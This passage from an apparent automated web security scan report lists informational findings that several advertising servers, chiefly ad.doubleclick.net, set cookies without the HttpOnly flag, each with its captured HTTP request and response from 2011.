GET /z/i.optout?f=1&success=http://www.networkadvertising.org/optout/opt_success.gif&failure=http://www.networkadvertising.org/optout/opt_failure.gif&tagKey=987828525&requestor=aLmtAZct6yKpcUcWnJrpGEJoCXSvBr1ToJoM6Mywpqjs9Ffvq2hr8nVpoIHNmZaC4PuexQUppSeEmBP3nDq5tPIpmcfFmHt29G HTTP/1.1
Host: a.tribalfusion.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
Cookie: ANON_ID=aXnX9qOZb3V7bEjUDvMidaWScbh5xabZbZailGc3CVs6E66XJ3bra2FuY2r9IoBuU1H2t33tkv7rNt17jRHB3318DQGPMR92kT7DnZbwUH6I0nn6WcH1j2CPGVUtZcclBVWRVYXdUo47ZbLM0728qZdZaWOdZbD0OoGTUddo7VHp3e3aArlEYjribDZbK9VeOEiAYybqSG3P3T6UCThFhZbmw0t54wIY0YVbFBub9VOeH4ZcVA4TgfKgvOJVx4vnl5n6wF8AZaWuZbjmiUZb0PqE2fpbMHLK8Sk

Response

HTTP/1.1 302 Moved Temporarily
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 306
X-Reuse-Index: 1
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Cache-Control: private
Set-Cookie: ANON_ID=OptOut; path=/; domain=.tribalfusion.com; expires=Tue, 14-Sep-2021 17:17:32 GMT;
Content-Type: text/html
Location: http://www.networkadvertising.org/optout/opt_success.gif
Content-Length: 36
Connection: keep-alive

<h1>Error 302 Moved Temporarily</h1>
13.39. http://ad.agkn.com/iframe!t=1089!  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1089!

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=3807892&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/u%3B245108818%3B0-0%3B0%3B69151653%3B3454-728/90%3B43624044/43641831/1%3B%3B%7Eokv%3D%3Bpc%3DDFP244754359%3B%3B%7Eaopt%3D0/ff/34/ff%3B%7Efdr%3D244754359%3B0-0%3B0%3B18485482%3B3454-728/90%3B43698008/43715795/1%3B%3B%7Eokv%3D%3Bsite%3Danswerology%3Bcat%3Dother%3Bdemo%3Dadult%3Btile%3D1%3Bsect%3Danswerology%3Bdcopt%3Dist%3Bsz%3D728x90%3Brsi%3D%3B%7Eaopt%3D2/0/34/0%3B%7Esscs%3D%3f HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=other&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=OPTOUT; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Thu, 15-Sep-2016 16:43:19 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=""; Version=1; Domain=.agkn.com; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:43:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
13.40. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.4  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N4478.hearst.comOX2468/B5477179.4

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N4478.hearst.comOX2468/B5477179.4;sz=1x1;pc=[TPAS_ID];ord=2323648? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Sat, 17 Sep 2011 16:27:46 GMT
Location: http://s0.2mdn.net/viewad/1782317/A_1x1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=ca9eb413c0000ea||t=1316276866|et=730|cs=002213fd48f6ce85e8915625c9; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:27:46 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:27:46 GMT
Server: GFE/2.0
Content-Type: text/html

13.41. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.87  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N4478.hearst.comOX2468/B5477179.87

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N4478.hearst.comOX2468/B5477179.87;sz=1x1;pc=[TPAS_ID];ord=2325304? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Sat, 17 Sep 2011 16:28:07 GMT
Location: http://s0.2mdn.net/viewad/1782317/A_1x1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=c87eb413c000042||t=1316276887|et=730|cs=002213fd4860b96821e9b9d240; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:28:07 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:28:07 GMT
Server: GFE/2.0
Content-Type: text/html

13.42. http://ad.doubleclick.net/ad/N4478.hearst.comOX2468/B5477179.88  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N4478.hearst.comOX2468/B5477179.88

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N4478.hearst.comOX2468/B5477179.88;sz=1x1;pc=[TPAS_ID];ord=2322226? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.thedailygreen.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Sat, 17 Sep 2011 16:27:18 GMT
Location: http://s0.2mdn.net/viewad/1782317/A_1x1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=cedeb413c000005||t=1316276838|et=730|cs=002213fd48cd6be19143dc9a0a; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:27:18 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:27:18 GMT
Server: GFE/2.0
Content-Type: text/html

13.43. http://ad.doubleclick.net/ad/N5823.131643.MEEBO/B5733109.2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N5823.131643.MEEBO/B5733109.2

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N5823.131643.MEEBO/B5733109.2;sz=1x1;ord=2367085? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_12_5&protocol=http%3A&network=seventeen
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Sat, 17 Sep 2011 16:36:47 GMT
Location: http://s0.2mdn.net/viewad/2505742/1x1.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=cb3fa413c000068||t=1316277407|et=730|cs=002213fd48d86c5ef92157bbd3; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:36:47 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:36:47 GMT
Server: GFE/2.0
Content-Type: text/html

13.44. http://ad.doubleclick.net/ad/N6482.3508.THESEATTLETIMES-POSTI/B5865206  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N6482.3508.THESEATTLETIMES-POSTI/B5865206

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N6482.3508.THESEATTLETIMES-POSTI/B5865206;sz=300x250;ord=1316277325.637259? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/flashtalking/ftlocal.html?ifsrc=http%3A%2F%2Fa.flashtalking.com%2Fxre%2F18%2F189583%2F237666%2Fjs%2Fj-189583-237666.js&click=http://mpc.mxptint.net/1S1S758D1EF6S0S9FSA2DS1S12CSFAS7CSB26_27703FDE_10878AA%3f&ftx=&fty=&ftadz=&ftscw=&cachebuster=802568.8005145639%26ftguid%3D1343AC00FD7B0F%26ftcfid%3D237666001%26ftoob%3D%26ftsg%3Dadg
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Sat, 17 Sep 2011 16:53:35 GMT
Location: http://s0.2mdn.net/viewad/2946429/Oktoberfest300x250.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=c821b423c000055||t=1316278415|et=730|cs=002213fd4814bb2c0a90c0d894; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:53:35 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:53:35 GMT
Server: GFE/2.0
Content-Type: text/html

13.45. http://ad.doubleclick.net/adi/N1395.132636.7201864412421/B3640803.5  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1395.132636.7201864412421/B3640803.5

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N1395.132636.7201864412421/B3640803.5;sz=728x90;ord=1316278452? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686626?t=1316296524359&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fwww.seattlepi.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5236
Set-Cookie: id=c0f63423c0000e0||t=1316280770|et=730|cs=002213fd48c5c0bcbe81bf4c62; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 17:32:50 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 17:32:50 GMT
Date: Sat, 17 Sep 2011 17:32:50 GMT
Expires: Sat, 17 Sep 2011 17:32:50 GMT
Cache-Control: private

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
13.46. http://ad.doubleclick.net/adi/N763.SpecificMedia.com/B5645537.30  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N763.SpecificMedia.com/B5645537.30

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adi/N763.SpecificMedia.com/B5645537.30;sz=728x90;pc=[TPAS_ID];click=http://clk.specificclick.net/click/v=5%3Bm=3%3Bl=24536%3Bc=176942%3Bb=1044949%3Bts=20110917123525%3Bdct=;ord=1316277325? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://afe.specificclick.net/serve/v=5;m=3;l=24536;c=176942;b=1044949;ts=20110917123525
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6091
Set-Cookie: id=c3c1d423c000085||t=1316278409|et=730|cs=002213fd4820a643dfe50be397; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:53:29 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:53:29 GMT
Date: Sat, 17 Sep 2011 16:53:29 GMT
Expires: Sat, 17 Sep 2011 16:53:29 GMT
Cache-Control: private

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Tue Aug 16 12:28:58 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.j
...[SNIP]...
13.47. http://ad.doubleclick.net/adj/DY146/ron_lifestyle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/DY146/ron_lifestyle

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/DY146/ron_lifestyle;sz=300x250;ord=2310888? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1877
Set-Cookie: id=c1600423c000022||t=1316277484|et=730|cs=002213fd48edd60cd1898eb29b; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:38:04 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:38:04 GMT
Date: Sat, 17 Sep 2011 16:38:04 GMT
Expires: Sat, 17 Sep 2011 16:38:04 GMT
Cache-Control: private

document.write('<SCRIPT language=\'JavaScript1.1\' SRC=\"http://ad.doubleclick.net/adj/N4610.DBG/B5042149.10;sz=300x250;pc=[TPAS_ID];click0=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/d%3B24
...[SNIP]...
13.48. http://ad.doubleclick.net/adj/N5295.SD128132N5295SN0/B5753751.3  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.SD128132N5295SN0/B5753751.3

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/N5295.SD128132N5295SN0/B5753751.3;sz=728x90;click0=http://a1.interclick.com/icaid/187969/tid/32538ae1-3af4-420f-9506-361ee76e8329/click.ic?;ord=634518590430909710? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/hearst/728x90/ht_1064834_61686642?t=1316294711579&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.seattlepi.com%2F&refer=http%3A%2F%2Fhearst.com%2Fnewspapers%2Fseattlepicom.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 38314
Set-Cookie: id=c07e7413c0000fe||t=1316276763|et=730|cs=002213fd48bb4f54b8fdb0bbf6; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:26:03 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:26:03 GMT
Date: Sat, 17 Sep 2011 16:26:03 GMT
Expires: Sat, 17 Sep 2011 16:26:03 GMT
Cache-Control: private

document.write('');

if(typeof(dartCallbackObjects) == "undefined")
var dartCallbackObjects = new Array();
if(typeof(dartCreativeDisplayManagers) == "undefined")
var dartCreativeDisplayManagers =
...[SNIP]...
13.49. http://ad.doubleclick.net/adj/hdm.answerology/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.answerology/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/hdm.answerology/;site=answerology;cat=homepage;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;ord=6608837274834514? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.answerology.com/index.aspx?template=ads.ascx&topic=homepage&tile=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 803
Set-Cookie: id=c43e9413c0000f3||t=1316276874|et=730|cs=002213fd489b619fd73d6ecf5d; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:27:54 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:27:54 GMT
Date: Sat, 17 Sep 2011 16:27:54 GMT
Expires: Sat, 17 Sep 2011 16:27:54 GMT
Cache-Control: private

document.write('<IFRAME SRC=\"http://ad.agkn.com/iframe!t=1089!?ct=US&st=TX&ac=214&zp=75207&bw=4&dma=102&city=13290&che=2499857&clk1=http://ad.doubleclick.net/click%3Bh%3Dv8/3b85/3/0/%2a/p%3B245108818
...[SNIP]...
13.50. http://ad.doubleclick.net/adj/hdm.donatemydress/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.donatemydress/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/hdm.donatemydress/;site=donatemydress;dcopt=ist;sz=728x90;tile=1;pos=1;ord=2692568986676633.5? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.donatemydress.org/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 277
Set-Cookie: id=c1bf4413c0000c4||t=1316277207|et=730|cs=002213fd48acbab5aa131f4e54; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:33:27 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:33:27 GMT
Date: Sat, 17 Sep 2011 16:33:27 GMT
Expires: Sat, 17 Sep 2011 16:33:27 GMT
Cache-Control: private

document.write('');

admeld_publisher = 303;
admeld_site = 'hearst_us';
admeld_size = '728x90';
admeld_placement = 'donatemydress_us';

document.write('\n<script type=\"text/javascript\
...[SNIP]...
13.51. http://ad.doubleclick.net/adj/hdm.misquincemag/other/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.misquincemag/other/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/hdm.misquincemag/other/;sz=728x90,1000x124;tile=1;pos=1;site=misquincemag;sect=index;sub=index;subsub=index;page=homepage;cat=other;subcat=;tool=ros;artid=;kw=;a=;b=;mtfIFPath=/cm/shared/admeld/;game=;ord=8617154576350003? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.misquincemag.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 276
Set-Cookie: id=ccff4413c0000fd||t=1316277234|et=730|cs=002213fd48d263a0fc74d34af8; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 16:33:54 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 16:33:54 GMT
Date: Sat, 17 Sep 2011 16:33:54 GMT
Expires: Sat, 17 Sep 2011 16:33:54 GMT
Cache-Control: private

document.write('');

admeld_publisher = 303;
admeld_site = 'hearst_us';
admeld_size = '728x90';
admeld_placement = 'misquincemag_us';

document.write('\n<script type=\"text/javascript\"
...[SNIP]...
13.52. http://ad.doubleclick.net/adj/hdm.quicksimple/answerology/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.quicksimple/answerology/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/hdm.quicksimple/answerology/;site=quicksimple;cat=homepage;demo=adult;tile=1;sect=answerology;dcopt=ist;sz=728x90;ord=1122309262641763? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://answerology.quickandsimple.com/index.aspx?template=ads.ascx&topic=homepage&tile=1
Cookie: id=OPT_OUT

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 627
Set-Cookie: id=cbc66423c000019||t=1316280732|et=730|cs=002213fd4849d550a5f323dd54; path=/; domain=.doubleclick.net; expires=Mon, 16 Sep 2013 17:32:12 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 16 Sep 2011 17:32:12 GMT
Date: Sat, 17 Sep 2011 17:32:13 GMT
Expires: Sat, 17 Sep 2011 17:32:13 GMT
Cache-Control: private

document.write('<!-- Template ID = 4134 Template Name = A HDM JPG/GIF as Rich Media -->\n<img src=\"http://m.doubleclick.net/dot.gif\" width=\"1\" height=\"1\" border=\"0\">\n<a href=\"http://ad.doubl
...[SNIP]...
13.53. http://ad.doubleclick.net/adj/hdm.quicksimple/other/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/hdm.quicksimple/other/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

